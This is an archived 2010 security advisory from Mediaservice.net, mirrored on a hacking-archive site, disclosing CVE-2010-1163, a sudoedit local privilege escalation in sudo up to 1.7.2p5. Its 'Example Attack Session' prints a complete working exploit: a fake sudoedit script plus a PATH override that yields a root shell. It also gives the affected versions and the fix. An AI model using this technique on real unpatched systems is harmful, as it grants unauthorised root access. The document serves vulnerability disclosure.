AOH :: HP Unsorted S :: BX6177.HTM

sudoedit local privilege escalation through PATH manipulation



sudoedit local privilege escalation through PATH manipulation
sudoedit local privilege escalation through PATH manipulation



This is a multi-part message in MIME format.
--------------010309030805030503000908
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Hi all,

See attached advisory.

-- 
Maurizio Agazzini                     CISSP, OPST
Senior Security Advisor
Team Manager
@ Mediaservice.net Srl                Tel: +39-011-32.72.100
Via San Bernardino, 17                Fax: +39-011-32.46.497
10141 Torino - ITALY http://mediaservice.net/ 

--------------010309030805030503000908
Content-Type: text/plain;
 name="2010-02-sudo.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="2010-02-sudo.txt"

Security Advisory 					@ Mediaservice.net Srl
(#02, 19/04/2010)					Data Security Division

         Title:	sudoedit local privilege escalation through PATH manipulation
   Application:	sudo <= 1.7.2p5
      Platform:	Linux, maybe others
   Description:	A local user with permission to run the sudoedit pseudo-command 
		can gain root privileges, through manipulation of the PATH 
		environment variable.
Authors:	Valerio Costamagna  
Maurizio Agazzini  
 Vendor Status: sudo team notified on 26/03/2010
 CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
		the name CVE-2010-1163 to this issue.
References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163 
http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html 

1. Abstract.

While writing an article about the vulnerability outlined in CVE-2010-0426, we
found a distinct security flaw, also related to the sudoedit pseudo-command.
Specifically, the path component of sudoedit is not checked correctly. This 
can be easily exploited by a local user with permission to run sudoedit, in 
order to execute arbitrary commands as root.

2. Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),
86(netdev),93(scanner)
sh-3.1#

3. Affected Platforms.

All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this
vulnerability requires that the /etc/sudoers file be configured to allow the
attacker to run sudoedit.

4. Fix.

On April 9th 2010, version 1.7.2p6 has been relased by the sudo team, which
fixes the described vulnerability.

5. Proof Of Concept.

See Example Attack Session above.

Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.

--------------010309030805030503000908--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.